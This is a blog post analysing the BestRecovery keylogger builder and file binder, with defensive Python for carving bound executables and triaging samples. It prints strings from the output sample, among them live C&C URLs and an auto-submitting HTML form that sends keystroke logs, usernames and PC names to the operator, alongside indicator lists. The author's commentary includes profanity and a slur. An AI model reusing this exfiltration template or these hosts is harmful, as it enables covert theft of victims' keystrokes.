Friday, September 13, 2013

BESTRECOVERY keylogger

The BestRecovery spy service provides users with a builder (the actual exe is called Builder.exe; however, it is really a file binder) that is used to create a new keylogger binary for each customer to distribute to victims.

In a traditional botnet, for example Andromeda, bot clients are built using a builder application. The bot master supplies the configuration data such as the C&C gate and build ID, and the builder pops out a new binary.
File binders are applications that allow a user to "bind" executables together resulting in a single executable. They are useful for crackers to insert other applications such as trojan horse executables into otherwise harmless files, making them more difficult to detect. (Source
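Because a binder just packages a payload executable next to a stub, the simplest defensive check is to look for a second PE image inside the file, which is what Resource Hacker did by hand later in this post. The following is an added example, not code from the post or from BestRecovery: it walks a blob for MZ headers, validates each candidate by following e_lfanew to the PE signature, sizes the image from its section table, and carves every complete image it finds. The `build_pe` helper only fabricates a minimal, structurally valid PE as constructed test data so the script runs offline; real samples are read from disk instead.

```python
import hashlib
import struct

MZ = b"MZ"
PE_SIG = b"PE\0\0"


def build_pe(section_name: bytes, section_data: bytes) -> bytes:
    """Build a minimal, structurally valid PE32 image (constructed test data, not a
    real executable). One section, raw data placed right after the headers."""
    opt_header_size = 224
    dos_header = bytearray(64)
    dos_header[0:2] = MZ
    struct.pack_into("<I", dos_header, 0x3C, 64)          # e_lfanew -> PE signature at 0x40
    # COFF header: Machine, NumberOfSections, TimeDateStamp, PtrToSymTab, NumSyms,
    # SizeOfOptionalHeader, Characteristics
    coff = struct.pack("<HHIIIHH", 0x14C, 1, 0, 0, 0, opt_header_size, 0x0102)
    opt = struct.pack("<H", 0x10B).ljust(opt_header_size, b"\0")   # PE32 magic, rest zeroed
    headers_len = 64 + 4 + 20 + opt_header_size + 40
    # Section header: Name, VirtualSize, VirtualAddress, SizeOfRawData, PointerToRawData,
    # PtrToRelocs, PtrToLinenums, NumRelocs, NumLinenums, Characteristics
    section = struct.pack("<8sIIIIIIHHI", section_name.ljust(8, b"\0"),
                          len(section_data), 0x1000, len(section_data), headers_len,
                          0, 0, 0, 0, 0x60000020)
    return bytes(dos_header) + PE_SIG + coff + opt + section + section_data


def _pe_size(blob: bytes, base: int) -> int:
    """Return the on-disk size of the PE image starting at base, or 0 if the headers
    do not parse or the image is truncated."""
    if base + 0x40 > len(blob):
        return 0
    e_lfanew = struct.unpack_from("<I", blob, base + 0x3C)[0]
    pe = base + e_lfanew
    # e_lfanew below the DOS header is a sanity check, not a hard PE rule
    if e_lfanew < 0x40 or pe + 24 > len(blob) or blob[pe:pe + 4] != PE_SIG:
        return 0
    n_sections, = struct.unpack_from("<H", blob, pe + 6)
    opt_size, = struct.unpack_from("<H", blob, pe + 20)
    sect_table = pe + 24 + opt_size
    end = sect_table + 40 * n_sections
    if n_sections == 0 or end > len(blob):
        return 0
    for i in range(n_sections):
        # SizeOfRawData and PointerToRawData sit at +16 and +20 of each section header
        raw_size, raw_ptr = struct.unpack_from("<II", blob, sect_table + 40 * i + 16)
        end = max(end, base + raw_ptr + raw_size)
    if end > len(blob):
        return 0  # truncated image, not a complete embedded file
    return end - base


def find_embedded_pe(blob: bytes):
    """Return (offset, size) for every PE image whose headers parse inside blob.
    Size comes from the section table, so a payload a binder appended as overlay
    (or stored in a resource) shows up as a separate candidate after the stub."""
    found = []
    pos = blob.find(MZ)
    while pos != -1:
        size = _pe_size(blob, pos)
        if size:
            found.append((pos, size))
        pos = blob.find(MZ, pos + 1)
    return found


def carve(blob: bytes):
    """Map each candidate offset to (sha256, image bytes) so hashes can be checked
    against VirusTotal the way the post does with the extracted PuTTY."""
    return {off: (hashlib.sha256(blob[off:off + size]).hexdigest(), blob[off:off + size])
            for off, size in find_embedded_pe(blob)}


if __name__ == "__main__":
    # Constructed binder-style layout: stub image, 7 bytes of padding, payload as overlay.
    stub = build_pe(b".text", b"\x90" * 16)
    payload = build_pe(b".data", b"constructed payload")
    blob = stub + b"\0" * 7 + payload + b"\0" * 3
    for off, (digest, _) in carve(blob).items():
        print(f"PE image at offset {off}: sha256 {digest}")
```

On a real binder output you would read the file into `blob`; the first candidate is the stub itself and any later candidate is a bound payload worth hashing and submitting on its own.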
The first BestRecovery builder I came across was version 12.4.




Ver 12.4 was a hideous awful mess of an application. 

Just looking at the builder makes me feel bad for the 419'ers using it. Not to mention I could not get this thing to kick out a useful sample. 



I had to run through the Error-FIXX directory and register some components. I forget, I was distracted by the horror show that is the ::: BESTRECOVERY BUILDER :::

Anyway, the admin updated the builder, I must have missed a few versions or he did it really quickly. The next time I checked the builder it was on 17.3 





I am a reverse engineer in training so I will do my best to figure out what the heck is going on under the hood.

I'm going to look at the builder itself and then the bound output file from the builder.

I used resource hacker to extract a file: (VT 28/47)
https://www.virustotal.com/en/file/aa02bcfd2997c889f730b33496b3635725be58039ab95f8cc4109fe50b62b50a/analysis/

Looks like this has been around the block already - I was not the first to get this on VT and its detection rate is high.


BestRecovery Builder v12.4 

All BestRecovery software can best be described as a copy/paste piece of shit.

I ran the 12.4 builder through "strings" and pulled out some data. The following are some useful details obtained from the BestRecovery 12.4 builder:
Builder_12.4
BEST RECOVERY
BESTRECOVERY
BESTRECOVERY
C:\Users\yaisr\Downloads\bs_fusion\data\MSCOMCTL.oca
C:\Users\yaisr\Downloads\bs_fusion\data\mswinsck.oca
http://hamarakindking.com/Builder.exe
AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup
Keyspy Will Not Be Responsible For Any Use/Misuse OF Other's Information
Ethics is Philosophical Study Of Moral Values & Rules. It is the motivation based on the ideas of Right & Wrong.
Professional Is A Person Engage in one of a Learned Professions.Who is the Expert in any particular Field Like Doctors,Engineers,Accountants Etc
The Idea is To Combine Both The above terms together To Make The Client Or Stakeholders Of any Profession Relax & Free From Worries & They Can Trust The Professional. Accountants are Deployed in many fields Forexample They Can contribute
To The Ecnomic Development Of Their Country & Global Economy.
They Can Act as Auditors,Financial managers.Accountants,So They Have A Very high Responsibility.Billions & Trillians OF Dollars & Pounds of shareholders,Bankers,Investors Are t Stake. If The Accountant Are biased Means Their Weath & Hard Earnings Of People (Pension Funds) Will Be At RISK.This is Why The Accountants Must Obey Some Sort of Ethics/Guidelines like IFAC Code Of Ethics & ACCA Code Of Ethics . Acca Code Of Ethics States That Accountants & its Members Must Have The Quality Of
1) Objectivity
2) Integrity
3) Professional Behaviour
4) Confidentiality
5) Professional Competence
Practitioner Needs To Behave & Seen To Behave In an Ethical Professional Manner. In His Professional Life He might Face some risky events or Delemas.Code ofEthics Says Accountatns must use their Ethical Judgment To Avoid & Resolve The Ethical Delemas & Be away from Conflict of Interest.Threats he May Be Facing can Be Of Many Types Like
phppost
http://aineyhosting.com/web.php
httppath
http://www.financetasksforce.com/ht.txt
Exif
Ducky
mhttp://ns.adobe.com/xap/1.0/
<?xpacket begin="
" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.0-c060 61.134777, 2010/02/12-17:32:00 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmpMM:OriginalDocumentID="xmp.did:23C5E3E8B0A4E0119B2AC28829143BAE" xmpMM:DocumentID="xmp.did:FE1ECDCBA4B011E0B3EA880C2BEAE119" xmpMM:InstanceID="xmp.iid:FE1ECDCAA4B011E0B3EA880C2BEAE119" xmp:CreatorTool="Adobe Photoshop CS5 Windows"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:24C5E3E8B0A4E0119B2AC28829143BAE" stRef:documentID="xmp.did:23C5E3E8B0A4E0119B2AC28829143BAE"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>

C:\Program Files (x86)\Microsoft Visual Studio\VB98\VB6.OLB
LED Table Marquee
(http://www.planet-source-code.com/vb/scripts/ShowCode.asp?txtCodeId=60188&lngWId=1)
BEST-RECOVERY
Lavf53.20.0 (mpeg encoder?)
LAME3.98.4
LAME3.98.4
LAME3.98.4
RIFFL
WAVEfmt

SOFTWARE\Borland\Delphi\RTL
Software\Borland\Delphi\Locales
Delphi%.8X
MFS_ENABLED
TGIFPainter (Delphi image function)
Delphi Picture
Delphi Component
NETSCAPE 2.0 ANIMEXTS1.0
Resource Hacker
RICHEDIT
System\CurrentControlSet\Control\Keyboard Layouts\%.8x

The Visual Component Library (VCL) is a set of visual components for the rapid development of Windows applications in the Delphi and C++ languages.
TImeMode
imDisable
imClose
imOpen
imDontCare
imSAlpha
imAlpha
imHira
imSKata
imKata imChinese
imSHanguel imHanguel

BestRecovery Builder v17.3

Interesting strings from the 17.3 builder.

C:\Users\yaisr\Desktop\Clon\1.pdb

C:\Users\yaisr\Desktop\BEST-RECOVERY\Error-FIXX\mswinsck.oca

SETTINGS:
phppost
http://aineyhosting.com/web.php
httppath
http://www.financetasksforce.com/ht.txt


BestRecovery Keylogger from Builder v17.3

I used the v17.3 builder to create an output sample. I chose putty.exe as my target file to bind the BR keylogger to.


Strings from builder output file:

<html>
<head>
</head>
<body>
<form method="POST" action="
teenk
"></p>
  <p>NOT:&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;
  <input type="text" name="note" size="20" value="
saatk
</textarea></p>
<p>&nbsp;</p>
  <p><input type="submit" value="hm" name="B1"></p>
</form>
<body onload="document.forms[0].submit();">
</body>
</html>
chek
"></p>
  <p>MSG:&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;
  <textarea rows="2" name="log" cols="7">
pank
"></p>
  <p>US:&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;
  <input type="text" name="user" size="20" value="
"></p>
  <p>COUNT:&nbsp; <input type="text" name="country" size="20" value="
dook
  <p>
  PC:&nbsp;&nbsp;&nbsp;
  <input type="text" name="pcname" size="20" value="
<html>
<head>
</head>
<body>
<form method="POST" action="


http://www.samair.ru/proxy/proxychecker/country.htm
Checks what country the users are from.  
http://achanbhai.com/bai.php
http://wirelesstecho.com/achabai.txt
C:\Users\yaisr\Desktop\Clon\1.pdb

This looks awful.

This can't be serious... but I think it is.

ReadyState
ieframe.dll
SHDocVwCtl.WebBrowser
WebBrowser

So it looks like someone created a shitty keylogger (probably ripped the code), and the design they came up with to send data back to the C&C was to create a browser window (the SHDocVwCtl.WebBrowser control), build an HTML form, and finally post the data back. Oh yeah, you also need to hit the samair.ru proxy checker to get the user's country first.

Fuck me, that's retarded.
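The upside of a design this crude is that the sample carries its whole exfil mechanism as plain strings: the form field names, the C&C and country-check URLs, the WebBrowser control ProgID and even the author's PDB path. The following is an added example, not code from the post or from BestRecovery, that turns those strings into a small triage rule: it pulls printable runs out of a blob the way `strings` does, matches them against indicator groups taken from the post, and only flags a file when more than one group fires, so a legitimate application that merely embeds the browser control is not flagged. Both sample blobs are constructed for the example.

```python
import re
from typing import Dict, List

# Indicator groups built from the strings the post lists for the v17.3 output.
# Grouping matters: "WebBrowser"/"ieframe.dll" alone are common in benign software.
INDICATORS = {
    "exfil_form_fields": [
        b'name="note"', b'name="log"', b'name="user"', b'name="country"',
        b'name="pcname"', b"document.forms[0].submit()",
    ],
    "c2_and_geolocation_urls": [
        b"http://achanbhai.com/bai.php",
        b"http://wirelesstecho.com/achabai.txt",
        b"http://www.samair.ru/proxy/proxychecker/country.htm",
    ],
    "browser_control_exfil": [b"SHDocVwCtl.WebBrowser", b"ieframe.dll", b"ReadyState"],
    "build_artifacts": [rb"C:\Users\yaisr\Desktop\Clon\1.pdb"],
}

# Same heuristic as `strings`: runs of 4+ printable ASCII bytes.
ASCII_RUN = re.compile(rb"[\x20-\x7e]{4,}")


def extract_strings(blob: bytes) -> List[bytes]:
    return ASCII_RUN.findall(blob)


def triage(blob: bytes) -> Dict[str, List[str]]:
    """Return, per indicator group, the indicators present among the blob's strings.
    Matching against the joined string list (not the raw bytes) means an indicator
    cannot be assembled across non-printable bytes."""
    haystack = b"\n".join(extract_strings(blob))
    return {group: [ind.decode() for ind in inds if ind in haystack]
            for group, inds in INDICATORS.items()}


def verdict(hits: Dict[str, List[str]]) -> bool:
    """Flag when at least two groups fire, or when the exfil form alone is nearly
    complete (3+ field names); a single generic group never flags on its own."""
    groups_hit = [g for g, h in hits.items() if h]
    return len(groups_hit) >= 2 or len(hits["exfil_form_fields"]) >= 3


# Constructed stand-in for the binder output: fragments seen in the post, separated
# by NUL bytes the way they would sit in a real binary's data section.
SUSPICIOUS_SAMPLE = b"MZ\x90\x00\x03\x00" + b"\x00\x00".join([
    b'<form method="POST" action="',
    b"http://achanbhai.com/bai.php",
    b'<input type="text" name="pcname" size="20" value="',
    b'<textarea rows="2" name="log" cols="7">',
    b'<input type="text" name="user" size="20" value="',
    b'<body onload="document.forms[0].submit();">',
    b"http://www.samair.ru/proxy/proxychecker/country.htm",
    b"SHDocVwCtl.WebBrowser",
    rb"C:\Users\yaisr\Desktop\Clon\1.pdb",
]) + b"\x00" * 8

# Constructed benign program that embeds the IE browser control for its own UI.
BENIGN_SAMPLE = b"MZ\x90\x00\x03\x00" + b"\x00\x00".join([
    b"SHDocVwCtl.WebBrowser", b"ieframe.dll", b"ReadyState", b"about:blank",
]) + b"\x00" * 8


if __name__ == "__main__":
    for label, sample in (("suspicious", SUSPICIOUS_SAMPLE), ("benign", BENIGN_SAMPLE)):
        hits = triage(sample)
        print(label, "->", "FLAG" if verdict(hits) else "clean", hits)
```

The same groups translate directly into a YARA rule with a `2 of them`-style condition; keeping the URLs and the PDB path in separate groups also makes it obvious when a new build changes only its C&C while the form template stays identical.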


Resource Hacker extracted the original PuTTY from the output file, and it's clean.

extracted resource (putty)
https://www.virustotal.com/en/file/abcc2a2d828b1624459cf8c4d2ccdfdcde62c8d1ab51e438db200ab3c5c8cd17/analysis/1379011357/

However, the entire bound package itself is naughty.

image (bound file) (VT 9/47)
https://www.virustotal.com/en/file/cb8757540e6d60e95a2187e734fec2d64fe5010f79b2e5fc2b1f7cc0291e8b89/analysis/1379011648/

https://malwr.com/analysis/OTc2Yzc3MzU4MzEyNGZjNDljNGMzMWIyOGM3ZjA1M2E/

(more samples I have found searching)
https://malwr.com/analysis/ODc4ZDM4MzRhOGE0NDY3M2JkMGM2OTg4MmRjYTM3MWQ/


Summary

The BestRecovery system is a hodgepodge of code that is held together by poor design.


I will be posting more again soon. Stay tuned for "Who is behind BestRecovery" ..


Other Links:

http://home.mcafee.com/virusinfo/virusprofile.aspx?key=3564054#none
